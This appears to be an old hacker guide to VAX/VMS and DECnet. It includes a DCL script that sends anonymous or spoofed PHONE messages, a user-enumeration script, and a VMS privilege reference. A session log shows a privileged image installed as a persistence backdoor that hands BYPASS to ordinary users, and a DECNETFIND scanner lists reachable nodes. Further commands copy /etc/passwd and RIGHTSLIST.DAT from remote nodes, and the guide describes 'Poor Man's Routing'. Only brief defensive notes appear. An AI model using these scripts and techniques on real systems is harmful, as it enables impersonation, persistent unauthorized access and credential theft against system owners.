			 - VAXPhone Information -

*1.      The phone protocol allows you to send messages.
	Example follows:

$! To send anonymous or fake messages(except for remote node system admins -
$! phone server logs) through the PHONE mailbox to any user logged on the NET,
$! similar to phone ringing messages broadcast to users' terminals; must only
$! have NETMBX privilege
$! Note:
$! This has the unfortunate side effect of kicking the user off his phone if 
$! its not a patched version.
$!
$ debug = "F"
$ null_byte[0,8] = 0
$ true_byte[0,8] = 1
$ false_byte[0,8] = 0
$ id_rmt_user[0,8] = 7          !text = id of remote user, status rtn
$ ring_rmt_user[0,8] = 8        !text = 1 byte, true if first ring, sts rtn
$ hang_up[0,8] = 9              !link broken, no status
$ master_busy[0,8] = 10         !when requested to do other functions
$ master_answer[0,8] = 11       !from another master
$ master_reject[0,8] = 12       !from another master
$ slave_exit[0,8] = 13          !command to slave
$ text[0,8] = 14                !text >= 1 char frag
$ request_dir[0,8] = 15         !null returned when done
$ force_third_party[0,8] = 17   !text is id of 3rd party
$ on_hold[0,8] = 18             !put target on hold
$ off_hold[0,8] = 19            !take target off hold
$!
$ status_unknown = 0    !Unknown problem
$ status_success = 1    !The operation was completed successfully.
$ status_isyntax = 2    !Invalid user syntax
$ status_nocomm = 3     !Slave could not communicate with user
$ status_missunam = 4   !<node::user> missing user name
$ status_nopriv = 5     !The slave does not have necessary privileges.
$ status_noexist = 6    !The specified Target user does not exist.
$ status_badterm = 7    !The Target's terminal cannot be used by PHONE.
$ status_logoff = 8     !The Target logged off during the procedure.
$ status_offhook = 9    !Target phone off hook (e.g., /NOBROADCAST set).
$!
$ remote_node = P1
$ if P1 .eqs. "" then read sys$command remote_node   /prompt="node : "
$ remote_user = p2
$ if P2 .eqs. "" then read sys$command remote_user   /prompt="user : "
$ remote_user := 'remote_user                   ! remove blanks and lowercases
$ local_user_in = "''P3'"
$ if P3 .eqs. "" then read sys$command local_user_in /prompt="text : "
$ local_user = "msg:: " + local_user_in + -
   "                                                                      " -
   + null_byte
$ open/read/write link 'remote_node'::"29="
$ write link id_rmt_user,local_user,remote_user
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if debug then write sys$output "Link to phone setup"
$ if local_user_in .eqs. "" then goto exit
$ write link ring_rmt_user,local_user,true_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if debug then write sys$output "1 ringy-dingy"
$       count = 1
$ on control_y then goto exit
$  goto exit
$LOOP:
$ write link ring_rmt_user,local_user,false_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if count .ge. 3 then goto exit
$       count = count +1
$       if debug then write sys$output count," ringy-dingies"
$ goto loop
$EXIT:
$ write link slave_exit,local_user
$ close link
$       if debug then write sys$output "Link cleared"
$ exit
$ERROR:
$! under development
$ write sys$output "An error has occured."
$ close link
$ exit

2.      The phone protocol allows you to get a list of interactive users on
	a system.
	From DEC's own archives, example follows:

$ vfy = f$verify(f$integer(f$logical("debug")) .or. f$integer('debug'+0))
$ if f$cvui(1,1,'debug'+0) .or. f$cvui(1,1,f$logical("debug")+0) -
    then write sys$error "File: PHONEDIR.COM, 29-Feb-1984"
$!++
$!  PHONEDIR.COM, E2.0 28-Oct-1985
$!
$!  COPYRIGHT (c) 1984 By
$!  DIGITAL EQUIPMENT CORPORATION, Maynard, Massachusetts 01754.
$!  All Rights Reserved.
$!
$!  This software is furnished without license and may be used and  copied
$!  only with the inclusion of the above copyright notice. No title to and
$!  ownership of the software is hereby transferred.
$!
$!  The information in this software is subject to change  without  notice
$!  and  should  not  be  construed as  a commitment by Digital  Equipment
$!  Corporation.
$!
$!  Digital  assumes  no responsibility for the use or reliability of this
$!  software.
$!--
$!++
$!  Author: SWM,  29-Feb-84,  PARROT::SWM
$!
$!  Edited:
$!    23-Nov-84 SWM, User lookup, V3 compatablility, Psthru capability.
$!    24-Nov-84 DC, Added logical name translation.
$!    30-Nov-84 DC, '_' overrides logical, infn loop check.
$!    27-Oct-85 SWM, Protocol fix, pipelining, clean up code.
$!
$!  Abstract:
$!    Take a directory of users across network via phone protocol.
$!
$!  Inputs: P1 = Node:: (or Node::Node::...) to get user list from;
$!    or Node::User to check on.  Remote user can be specified as
$!    separate parameter P2.  Double colon optional if single node.
$!
$!--
$INITIALIZE:
$ on control_y then goto close
$ set noon
$ v4 = "true"
$ if f$extr(0,2,f$getsyi("version")) .eqs. "V3" then v4 = "false"
$!$ error_status = %x1001C002
$ null[0,8] = 0
$!$ if v4 then old_msg = f$envi("message")
$!$ set message /nofacility/noseverity/noidentification/notext
$!
$ask_node_name:
$ if p1 .eqs. "" then read/end=exit/error=exit sys$command p1 /prompt="Node? "
$ if p1 .eqs. "" then goto exit
$!
$! allow override of node::user logical names
$ sanity_check = 0
$log_name_loop:
$ underscore_found = f$locate("_",p1) .eq. 0
$ if underscore_found then goto got_node_name
$ if f$logi(p1) .eqs. "" then goto got_node_name
$ p1 = f$logi(p1)
$ sanity_check = sanity_check + 1
$ if sanity_check .le. 64 then goto log_name_loop
$ goto error
$!
$got_node_name:
$! add username to node string if specified as separate parameter
$ if p2 .nes. "" then -
   if f$extr(f$leng(p1)-2,2,p1) .eqs. "::" then p1 = f$extr(0,f$leng(p1)-2,p1)
$ if p2 .nes. "" then p1 = p1 + "::" + p2
$! check if single node specified without dbbl colon.
$ if p2 .eqs. "" then -
    if f$parse(p1,,,"node") .eqs. "" then p1 = p1 + "::"
$!-    if f$extr(f$leng(p1)-2,2,p1) .nes. "::" then p1 = p1 + "::"
$!
$ if v4 then p1 = f$edit(p1,"trim,upcase,uncomment")
$ if .not. v4 then p1 := 'p1'
$ remote_user_name = f$parse(p1,,,"name")
$ node = f$extr(0,f$leng(p1)-f$leng(remote_user_name),p1)
$ if node .eqs. "" then node = f$logi("sys$node")
$! commented out doesn't work if access ctrl (f$parse hides password).
$!$ remote_user = node - f$parse(f$extr(0,f$leng(node)-2,node),,,"node") -
$!-    + remote_user_name       ! remove any psthru node names...
$!
$ sanity_check = 0
$ temp = node
$ node_string = ""
$! loop to find name of destination node for use in phone protocol...
$dest_node_loop:
$ loc = f$loca("::",temp)
$ node_string = node_string + f$parse(f$extr(0,loc+2,temp),,,"node")
$! commented out for alternate node_string display if using access ctrl.
$!$ node_string = node_string + f$extr(0,loc,temp)
$!$ node_string = f$extr(0,f$loca("""",node_string),node_string) + "::"
$ remote_user = f$extr(0,loc,temp)                      ! last node
$ remote_user = f$extr(0,f$loca("""",remote_user),remote_user) ! minus a/c.
$ temp = f$extr(loc+2,999,temp)
$ sanity_check = sanity_check + 1
$ if f$loca("::",temp) .ne. f$leng(temp) .and. sanity_check .lt. 32 -
    then goto dest_node_loop
$ remote_user = remote_user + "::" + remote_user_name
$!
$ if v4 then local_user = f$logi("sys$node") + -
    f$edit(f$getjpi("","pid"),"trim,upcase")
$ if .not. v4 then local_user := 'f$logi("sys$node")''f$getjpi("","pid")'
$ local_user = local_user - "_" + null                  ! asciz string
$!
$CREATE_LINK:
$! noon is set so display error message
$ open/read/write slave 'node'"29="
$ save_status = $status
$!$ if save_status .eq. error_status then goto unreachable
$ if .not. save_status then goto exit
$!
$ if remote_user_name .eqs. "" then goto dir_function
$LOCATE_FUNCTION:
$ message[0,8] = 7                                      ! ID remote user
$ message = message + local_user + remote_user
$ write/error=error slave message
$ read/end=error/error=error slave record
$ if f$cvui(0,8,record) .eq. 1 then -
    write sys$output "''remote_user' is currently available."
$! Note: These response values, while defined in the phone protocol do
$!   not seem to be supported in response to the ID function for VAXPhone.
$ if f$cvui(0,8,record) .eq. 6 then -
    write sys$output "''remote_user' is not available."
$ if f$cvui(0,8,record) .eq. 7 then -
    write sys$output "''remote_user''s phone is not usable by phone."
$ if f$cvui(0,8,record) .eq. 9 then -
    write sys$output "''remote_user''s phone is off hook (/NOBROADCAST)."
$ if (f$cvui(0,8,record) .ne. 1) .and. (f$cvui(0,8,record) .ne. 6) .and. -
    (f$cvui(0,8,record) .ne. 7) .and. (f$cvui(0,8,record) .ne. 9) then -
   write sys$output "''f$fao("Bad status received = !2ZB.",f$cvui(0,8,record))
$ exit_command[0,8] = 13
$ write/error=error slave exit_command,local_user
$ goto close
$!
$DIR_FUNCTION:
$ message[0,8] = 15                                     ! Request directory
$ message = message + local_user
$ write/error=error slave message
$ write/error=error slave message                       ! Pipeline requests!!!
$ write/error=error slave message
$ write/error=error slave message
$! Pipelining limited to 2 extra requests max to keep procedure from hanging.
$!   Worst case limit is (DECnet_Pipeline_Quota/DECnet_Buffer_Size) * 2 + 1
$print_header:
$ count = 0
$ write sys$output ""
$ write sys$output "	Directory of Users on Node ",node_string
$ write sys$output ""
$! skip pipeline hack code as RMS timeouts don't with DECnet yet.
$ GOTO LOOP
$!$ if .not. v4 then write/error=error slave message
$ if .not. v4 then goto loop
$! Put up to 8 requests in logical link pipe...
$ sanity_check = 3                                      ! number msgs in pipe.
$pipeline_hack:
$ sanity_check = sanity_check + 1
$ if sanity_check .ge. 8 then goto loop
$ write/error=error slave message
$ read/end=eof/error=pipeline_hack/timeout=0 slave record
$ goto loop_alt_entry
$!
$loop:
$ read/end=eof/error=error slave record
$loop_alt_entry:
$ if record .eqs. "" then goto done
$ write/error=error slave message
$ write sys$output record
$ count = count + 1
$ goto loop
$eof:
$! rsx-11 phone slave closes link after directory function.
$ rsx = "  (System is RSX)"
$done:
$ write sys$output ""
$ write sys$output "Total number of users = ''f$string(count)'''rsx'"
$! don't tell slave to exit if link already closed.
$ if "''rsx'" .nes. "" then goto close
$ exit_command[0,8] = 13
$ exit_command = exit_command + local_user
$ write slave exit_command
$eof_loop:
$ GOTO CLOSE                                            ! Hack!!!
$! Note: Should finish up properly by reading all responses.
$ read/end=close/error=error slave dummy
$!$ write sys$output dummy                              ! show empty data
$ goto eof_loop
$!
$unreachable:                                           ! this removed...
$! this section left in for possible enhanced error checking...
$!$ write sys$output ""
$!$ write sys$output "Node unreachable, unknown, or object unknown."
$ goto exit
$ERROR:
$ write sys$error "PHONEDIR-E-BugCheck, An error has occured."
$close:
$! close the link no matter what.
$ close /error=exit slave
$exit:
$!$ set message 'old_msg'
$ if vfy then set verify                                ! 'f$verify(0)'
$ exit

	BTW: There is a modified phone program available via
	     anonymous ftp which gives increased functionality
	     with commands such as 'reject' and 'transcribe'

	      -      User/Image Privilege Information     -

1.      "How are user privileges setup?"

	User privileges are handled in a completely different manner
	than Unix handles them.  With Unix,  you have either 

	a> all priveleges (IE - "root") 
	b> standard user 

	VMS is a touch different.

	For example,  let's say you have a field engineer that needs
	a standard user account (I.E. - be able to send/receive mail, 
	do standard DCL commands.. Normal TMPMBX, NETMBX,  and
	all that),  but in order to do his job,  he needs to run the
	online VMS diagnostics software (which is a privileged operation)
	When you add the user,  you can grant him "DIAGNOSE" privledges,
	and normal user privileges,  and he will be able do regular users
	commands and run diagnostics. 

	What this means is that you can grant certain privileged 
	function to certain users,  rather than giving the user 
	"the whole system".  

	This user we added would only have access to privileges that deal
	with the diagnostic software.  For example,  he could not add
	users (via "AUTHORIZE" or modify the SYSUAF.DAT).  

"Privileges restrict the user of certain system functions to processes
created on the behalf of authorized users.  These restrictions protect 
the integrity of the operating system code,  data,  and resources and
thus,  the integrity of user services." 

"Users cannot execute an image that requires a privilege they do not 
possess,  unless the image is installed as a known image with the 
privilege in question or the image runs within a protected subsystem"

	Privileges can also be installed on images,  so that when that 
	image is executed,  that images process get the permissions 
	that it has been granted (this does not mean that the user gets
	the privileges,  but rather,  just the process running this
	task)

			- OpenVMS VAX Guide To System Security
			  (6.0 manual). 

	Below is a listing of privileges,  and a brief description.

ACNT      -     Lets a process use the RUN (Process) command to create
		Process ($CREPRC) system service to create processes
		in which accounting is disabled.  A process in which
		account is disabled is on whose resources are not logged. 

ALLSPOOL  -     This privilege lets user's process allocate a spooled
		device by executing the Allocate Device ($ALLOC) system
		service or by users the DCL command "ALLOCATE"

ALTPRI    -     Allows the user's process to 
		1.  Increase its own priority
		2.  Set the base priority of a target process
		3.  Change priority of its batch or print jobs. 

AUDIT     -     Allows software to append to audit records to the system
		security audit log file.   As a result,  this privilege
		permits the logging of events that appear to come from the
		operating system

BUGCHK    -     Allows the process to make bugcheck error log entries
		from users,  supervisor, or compatibility mode or to send
		messages to the system error logger. 

BYPASS    -     Allows the user's process full access to all protected
		objects,  totally bypassing UIC-based protection, 
		ACL protection (Access Control List) and mandatory 
		access controls.   Users with this privilege can 
		modify authorization records (SYSUAF.DAT,  where
		usernames/passwords are stored),  rights identifiers
		(RIGHTSLIST.DAT), DECNet object passwords and accounts
		(NETOBJECT.DAT),  and unlimited file access.

CMEXEC    -     Allows the user's process to execute the Change Mode to
		Executive system service.

CMKRNL    -     Allows the user's process to execute the Change Mode to
		Kernel system services.   These privileges allow 
		things like modify a multiprocessor operation (START/
		CPU,  STOP/CPU type commands),  modifying the system
		rights list (SET RIGHTS/ATTRIBUTE), change a processes
		UIC (SET UIC),  and other functions.

DETACH    -     Processes can create detached processes that have there
		own UIC without the DETACH privilege,  provided the 
		processes wants to specify a different UIC for the 

DIAGNOSE  -     Lets a process run online diagnostic programs and intercept
		and copy all messages written to the error log file. 

DOWNGRADE -     Permits a process to manipulate mandatory access controls.

EXQUOTA   -     Allows the space taken by the user's files on a given
		disk volumes to exceed any usage quotas set for the user 
		(as determined by UIC) on those volumes. 

GROUP     -     Allows the user's process to affect other processes in its
		own group.

GRPNAME   -     Lets the user's process bypass  access controls
		and insert names into (and delete from) the logical table
		of the group to which the process belongs by the use of the
		Create Logical Bane and Delete Logical Name system services.

GRPPRV    -     When the process's group matches the group of the object
		owner,  the GRPPRV privilege gives a process the access rights
		provided by the object's system protection field.  GRPPRV
		also lets a process change the protection or the 
		ownership of any object whose owner group matches the
		process's group by using the DCL commands SET SECURITY

IMPORT    -     Lets a process manipulate mandatory access controls.  The
		privilege lets a process mount unlabeled tape volumes.  
		This privilege is reserved for enhanced security products
		like SEVMS. 

LOG_IO    -     Lets the user's process execute the Queue I/O request
		($QIO) system service to perform logical-level I/O
		operations.

MOUNT     -     Lets the user's process execute the mount volume QIO
		function. 

NETMBX    -     lets a process perform functions related to a DECNet
		Computer Network. 

OPER      -     Allows a process to use the Operator Communications 
		Manager (OPCOM) process to reply to user's request, 
		to broadcast messages to all terminals logged in,  to 
		designate terminals as operator terminals and specify
		the types of messages to be displayed to these operator's
		terminals,  and to initialize and control the log file
		of operator's messages. 

PFNMAP    -     Lets a user's process create and map page frame number
		(PFN) global sections to specific pages of physical 
		memory or I/O device registers,  no matter who is using
		the pages or registers. 

PHY_IO    -     Lets the user's process execute the Queue I/O request
		($QUI) system service to perform physical-level I/O
		operations. 

PRMCEB    -     Lets the user's process create or delete a permanent
		common even flag cluster by executing the Associate 
		Common Event Flag Cluster. 

PRMGBL    -     Lets the user's process create or delete permanent 
		global section by executing the Create and Map Section
		or Delete Global Section system service.  In addition
		,  a process with this privilege (plus CMKRNL and SYSGLB
		privileges) can use the Install utility (INSTALL)

PRMMBX    -     Lets user's process create or delete permanent mailbox
		by the Create Mailbox and Assign Channel system service
		or the DElete Mailbox system service.   Mailboxes are
		buffers in virtual memory that are treated as if they were
		record oriented I/O devices.  A mailbox is used for
		general interprocess communications. 

PSWAPM    -     Lets the user's process control whether is can be 
		swapped out of the balance set by executing the 
		Set Process Swap Mode system service. 

READALL   -     Lets the process bypass existing restrictions that would
		otherwise prevent the process from reading an object. 
		Unlike the BYPASS privilege which will permits writing and
		deleting,  READALL permits only the reading of objects
		and allow updating of such backup-related file
		characteristics as the backup date. 

SECURITY  -     Lets a process perform security related functions such
		as modifying the system password with the DCL command
		SET PASSWORD /SYSTEM or modifying the system alarm 
		and auditing settings using the DCL command 
		SET AUDIT.  

SETPRV    -     Lets user's create process whose privileges are greater
		than its own.   With this privilege,  a user can obtain
		any other privilege via the DCL command "SET PROCESS/
		PRIV"

SHARE     -     Lets process assign channels to devices allocated to other
		processes or to a non-shared device the Assign I/O Channel
		system service. 

SHMEM     -     Lets the user's process create global sections and 
		mailboxes (permanent or temporary_ in memory shared by
		multiple processors if the process also has appropriate
		PRMGBL,  PRMMBX,  SYSGBL,  and TMPMBX privileges. 

SYSGBL    -     Lets user;s create or delete system global sections by
		executing the Create and Map Sections or the Delete
		Global Section system services.  With this privilege
		and CMKRNL and PRMGBL,  the Install command (INSTALL)
		can be used. 

SYSNAM    -     Let's user's process bypass discrepancy access
		controls and insert names into the system logical
		name table and delete names from that table.  A
		process with this privilege can use the DCL commands
		ASSIGN and DEFINE to add names to the system logical
		in the user or executive mode and can use the DEASSIGN
		command in either mode to delete names from the 
		table. 

SYSPRV    -     Lets a process access security objects by the system
		protection field and also read and modify the owner
		(UIC),  the UIC-based protection code,  and the ACL 
		of and object.   Any processes with this privilege
		can add,  modify,  or delete entries in the system
		user authorization file (SYSUAF.DAT)

TMPMBX    -     Lets user's create process create a temporary mailbox
		by executing the Create Mailbox and Assign Channel. 

UPGRADE   -     Lets a process manipulate access controls.  This privilege
		is reserved for enhanced security products like SEVMS.

VOLPRO    -     Lets user's processes:
			o Initialize a previously used volume with an owner
			  UIC different from the user's own UIC.
			o Override the expiration date on a tape or
			  disk owned by another user. 
			o Use the ////FOREIGN qualifier to mount a Files-11
			  volume owned by another user.
			o Override the owner UIC protection of volume. 

WORLD     -     Lets user's process affect (suspend, resume, delete, 
		set priority, wake,  etc) other processes both inside
		and outside its group.

				- Taken Mostly From the, "OpenVMS VAX
				  System Security" (V6.0) 

2.      "How can I make a SUID Shell in VMS".... 

	Simple...  You can't.   Privileges are handled in a much different
	method than on Unix (see "How are user privileges setup").  You
	can make a program (image) that when executed,  the process
	of that image gains the privileges that it was "installed"
	with.    For example,  if you write a program that needs read access
	to the SYSUAF.DAT you *could* make SYSUAF.DAT world readable 
	(if you are on a privileged account,  of course)  but this 
	would be very,  very unwise.    Another method would be to 
	"INSTALL" the executable image and give it READALL privileges, 
	so that when a user's processes calls your programs,  that programs
	process (the image running) gets READALL privileges.   Then that
	process would be able to read the SYSUAF.DAT,   but the user's
	process would not.  

	With this in mind,   it is possible to create a senerio similar
	to that of a "SUID Shell" (but without the shell).  The idea
	is to give the privileges (that you want to keep a hold of) 
	on a program that does nothing more than make a call to 
	LIB$SPAWN.   The idea is to write a program that will do nothing
	more than create another process (that drops you to DCL)
	via LIB$SPAWN,  and using the VMS "INSTALL" utility,  give it
	the privileges that you wish that process to have.  There are
	several downfalls to this.  To accomplish this,  you would
	need CMKRNL privileges yourself (your process).  So your process
	would already need certain privileges to pull this off. The idea 
	here is in the event that the user has obtained a "privileged
	account",  and wishes to remain privileged,  he/she could 
	install a image which could be called by a normal (non-privileged)
	user in which he/she could obtain the system privileges again. 

	Below is a sample session capture of me installing a privileged
	image.   The privilege I gave this image is "BYPASS" (Bypass
	all security features,  and the ability to modify SYSUAF.DAT
	and RIGHTSLIST.DAT)

Trying...
Connected to UpperDck
Escape character is '^]'.

		       Upper-Dck VMS Development System 

Username: SYSTEM   ! Login to our privileged account
Password: 
	Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:17
    Last non-interactive login on Thursday, 22-DEC-1994 15:51

 User= SYSTEM       Directory= [SYSMGR]       UIC=  [1,4]
	Terminal= NTY5:       6-JAN-1995 07:19:01.00

sysm>basic      ! I am going to use VMS BASIC,  but use anything you want

VAX BASIC V2.3

Ready

10 external long function lib$spawn ! Call "SPAWN" library.  The idea with this
   declare long xspawn              ! program is to give us another "spawned"
   xspawn=lib$spawn()               ! process. 

save mytrap             ! Save this program
Ready

exit                    ! and exit the VMS BASIC. 
sysm>basic mytrap*.*    ! Just to show our file. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        

Total of 1 file.
sysm>basic mytrap       ! This will compile and make our object code
sysm>dir mytrap*.*      ! To show our object code. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.OBJ;1        

Total of 2 files.

sysm>link mytrap/notraceback  ! Link it, with notraceback (for priv reasons)
sysm>dir mytrap*.*            ! To show our executable code. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.EXE;1        MYTRAP.OBJ;1        

Total of 3 files.

sysm>copy mytrap.exe sys$system:  ! copy it to sys$system: [this is silly] 
sysm>install                      ! Run install to setup priv's on our imagine.
INSTALL> create mytrap/priv=(bypass) ! Give "mytrap" bypass priv's
INSTALL> list mytrap/full            ! Just to show off the image priv's

DISK$VAXVMSRL5:<SYS6.SYSEXE>.EXE
   MYTRAP;2                       Prv 
	Entry access count         = 0
	Privileges = BYPASS 

INSTALL> exit                    ! Get the hell out of here.
sysm>dir sys$system:mytrap.exe   ! And just to show its still there

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2        MYTRAP.EXE;1        

Total of 2 files.

sysm>dir sys$system:mytrap.exe;2 /full ! Notice "world" protections...

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2                  File ID:  (43314,33,0)       
Size:            4/6          Owner:    [1,4]
Created:   6-JAN-1995 07:20:26.35
Revised:   6-JAN-1995 07:20:41.54 (2)
Expires:   <None specified>
Backup:    <No backup recorded>
File organization:  Sequential
File attributes:    Allocation: 6, Extend: 0, Global buffer count: 0
		    No version limit, Contiguous best try
Record format:      Fixed length 512 byte records
Record attributes:  None
RMS attributes:     None
Journaling enabled: None
File protection:    System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List:  None

sysm>set file sys$system:mytrap.exe /protection=(w:re) ! because world cant
sysm>log                                               ! read/execute. Logout. 

  SYSTEM       logged out at  6-JAN-1995 07:42:02.55
Connection closed by foreign host.

	[Now,  we make a new connection to the system to test our ]
	[ "MYTRAP.EXE" with the image priv's attached to it       ]

Trying...
Connected to UpperDck.
Escape character is '^]'.

		       Upper-Dck VMS Development System 

Username: JOEBOB        ! Now, log as a normal user. 
Password: 
	Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:14

 User= JOEBOB        Directory= [UPPERDCK]       UIC=  [130,163]
	Terminal= NTY6:       6-JAN-1995 07:42:12.00

UPDCK> show process/priv ! To prove that we have normal user priv's

 6-JAN-1995 07:42:27.01   User: JOEBOB           Process ID:   0000010F
			  Node: UPPERDCK         Process name: "JOEBOB"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set proc/priv=bypass ! To prove I can't enabled "BYPASS" priv's
%SYSTEM-W-NOTALLPRIV, not all requested privileges authorized
UPDCK> mcr mytrap           ! Run our little "privledge provider"
UPDCK> show process/priv    ! To show our priv's after we exec. MYTRAP.EXE
			    ! note that we are spawned (see PID and Proc. Name)

 6-JAN-1995 07:42:46.05   User: JOEBOB           Process ID:   00000110
			  Node: UPPERDCK         Process name: "JOJBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set process/priv=bypass ! Note,  no error when we do this now. 
UPDCK> show process/priv       ! To prove that we have gained BYPASS

 6-JAN-1995 07:42:53.37   User: JOEBOB           Process ID:   00000110
			  Node: UPPERDCK         Process name: "JOEBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device
 BYPASS               bypasses UIC checking 

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> logout ! I can pretty much do anything now.... Lets stop this subprocess
  Process JOEBOB_1 logged out at  6-JAN-1995 07:42:59.01
UPDCK> logout ! logout completely

  JOEBOB       logged out at  6-JAN-1995 07:43:05.11
Connection closed by foreign host.

   (Grr.. This needs to be re-written.. doesn't it....) 

	     -     Using DEC's Network to your advantage     -

1.      "What is a DECNet?"

"DECNet is a collective name for the family of communications products
(software and hardware) that allow DIGITAL operating systems to participate
in a network.  

"A DECNet network links computers into flexible configurations to exchange
information,  share resources,  and perform distributed processing.  DECNet
distribution processing capabilities also information to be originated
anywhere in the network."

		- VMS Version 5.0 DECnet "Guide to DECNet - VAX Networking"

	DECNet can support a minimum of 2 nodes and up to 64,000 nodes, 
	and can support multiple OS's along with various LAN/WAN
	(Using PSI,  and DECNet system can be supported on packet 
	switching environments (like Tymnet and Sprintnet) and  
	operating environments. (VMS,   Ultrix,  RSX, and with the correct
	hardware,  IBM PC's,  VAXmate's, etc).  

	DECNet allows easy access to information from system to system,
	assuming you have the NETMBX privilege.

	To get a list of DECNet objects, "$MCR NCP SHOW KNOWN OBJECTS".

2.      "This is great,  what does it mean to me."

	You can use DECNet to grab information/files/programs and use
	them to your own advantage (granted that security has not 
	been completely implemented... which is usually the case
	on a vanilla/default install)

	For instance,  if a intruder were to break into a system
	which supported a DECNet,  he/she might be able to access files on
	a remote system/nodes of that DECNet.  As stated,   DECNets
	can range from local machines in that area (LAN) or 
	DECNet's can stretch across the world.  

3.      "How would I get to that information on a remote node?"

	All from DCL,  accessing the default, unprived DECNet or possibly
	prived proxy account on the remote node, using commands like
	"DIRECTORY",  "COPY", "TYPE",  etc.   Usually by adding in the node
	name at the being of the command.  For example

$ DIR NODE::            ! Example format.

	or 

$ DIR NODE::SYS$COMMON:[SYSEXE]  ! Shows logical SYS$COMMON and the SYSEXE
				 ! Directory on the remote node. 

	or

$ COPY NODE::DISK1:[BOB]SECRET.TXT []  ! The "[]" means "wherever i am"

	Remember DECNet object logs are being kept!

4.      "What if I want to connect and use the nodes interactively?". 

	One of two ways.  Either way requires NETMBX privilege. Try to
	"SET HOST [NODENAME]".  If that fails, 
	try to use NCP (Network Control Program),  like this.....

$ MCR NCP CONNECT NODE [NODENAME]

5.      "Well, Gee,  thats wonderful.  How do I find connectable nodes
	that are on the DECNet"

	Once again, this information can be found using the NCP (
	or via a "SHOW NETWORK") command. "SHOW NETWORK" won't work  
	if you are on a non-routing node. You might not get a 
	*complete* listing,  because the host you are on might not 
	know all DECNet nodes,  but it will at least get you hoping 
	around on the DECNet.  This list can be obtain via executing.....

$ MCP NCP SHOW KNOWN NODE (SYS$SYSTEM:NETNODE_LOCAL.DAT,
			   SYS$SYSTEM:NETNODE_REMOTE.DAT)

	This will dump a list.  You can sort though the information 
	using the NCP connect command,  and see what all sorts 
	of things you run into (Xyplex/DECServers,  Other VMS Machines, 
	SNA Gateway controllers,  etc, etc).  If you are only interested
	in machine that you can get file information on,  you can 
	us the following command file to find nodes that you can
	use. 

$! DECNETFIND  Version 1.0
$! Coded By The Beaver
$! Jan 5th,  1995
$!
$! The intent of this code is to scan for remote,  connectable nodes that
$! the VMS host knows about (Via NCP) and build a list.  Once this list
$! has been created,  we check to see if the remote machine is indeed
$! A> VMS (Later rev. will include Ultrix/OSF(?)) 2> Can it be directly
$! accessed via the DECNet 3> Can we read file systems on the remote node. 
$! Node that are "successful" are stored away.  This prevents mucho 
$! time consuming scanning by hand.  
$!
$!
$ on error then goto err                        ! In case of Boo-Boo
$ say :== write sys$output
$ if p1 .eqs. ""                                ! Yes, output file helps 
$       then
$       say "DECNet VMS Node Finder Version 1.0                   1995"
$       say "Coded By The Beaver"
$       say ""
$       say "Usage:"
$       say "DECNETFIND [Outfile]"
$       exit
$       endif
$!
$ say "Building Node List Via NCP....(Working)"
$!
$ mcr ncp show known nodes to nodes.out  ! Fire up NCP and dump nodeslist
$ open/read in nodes.out                 ! Open to read
$ open/write nodelist 'p1'               ! "Success" Storage area. 
$ on severe_error then loop1             ! So things dont die on "dir ::"'s
$!
$ loop1:
$ read/end = end in line
$       name=f$element(0,")", f$element(1, "(", line)) ! grab a nodename
$       if name .gts. "(" 
$         then  
$         say "**************************************************************"
$         say "Nodename: "+name
$         say ""
$         dir 'name'::          ! See if we can get to it via a DECNet DIR::
$         if $severity .nes "1"
$               then
$               say "Status:  Node Unreachable Via DECNet Dir::"
$               else
$               say "Status:  Found Good Node. [Logged]"
$               write nodelist name             ! Log it.
$               endif
$ endif
$ goto loop1
$ err:
$ say "Ouch.  There has been a error!"
$ end:
$ close in
$ close nodelist                ! Close up and leave,  exit stage
$ delete nodes.out;*            ! right
$ say "Complete!"
$ exit

	"That works great,  but I ran into a Unix (Ultrix) machine,  and 
	when I do a 'DIR NODENAME::' it only gives me some jerk-off's 
	directory.   Is there anyway I can grab files off the remote machine 
	(Ultrix) and directory listings?"

	Once again,  no problem.   Format the command like this:

$ DIR NODE::"/etc"      ! will give remote nodes /etc directory

	Or to grab the /etc/passwd file on the remote node,  try....

$ TYPE NODE::"/etc/passwd"   ! And open a capture buffer. 

	"Can I grab a VMS rights list?"

$ COPY NODE::"SYS$SYSTEM:RIGHTSLIST.DAT" RIGHTSLIST.DAT

6.  "Can't DECNet be protected more against this generic attack?"

	Sure,  by disabling the DECNet account and by watching any
	proxy accounts that may be set up (probably not a good idea to
	have a proxy into a privileged account). Unless a proxy account is
	set up (SYS$SYSTEM:NETPROXY.DAT), users must supply a password when
	attempting to do network operations like above.  Proxy logins are
	formatted below:

	(This example is using the DCL COPY command)

	COPY remotenode"proxyaccount"::filename filename

	for example, 

	COPY ADAM"BOB"::SECURITY.TXT MYSECURITY.TXT

	(BOB - The Proxy login name)

	However,  in a vannila VMS (IE - Default installation), 
	proxy logins are not enabled. 

7.      "Are proxy logins logged.. Can I write a routine that will
	attempt proxy accounts to break into remote machines?"

	You bet that proxy logins are logged.   Repeating invalid 
	attempts will inform the administrations that a "NETWORK
	BREAK IN" is in effect (via the OPCOM process). 

*8.      Sneak Routing

	You can access a machine you normally couldn't by piggy-backing
	over a machine(that can get to the machine you can't) you can get to
	through the DECNet account. This is called "Poor Man's Routing". It
	is preventable by the sys admin on the piggyback machine.

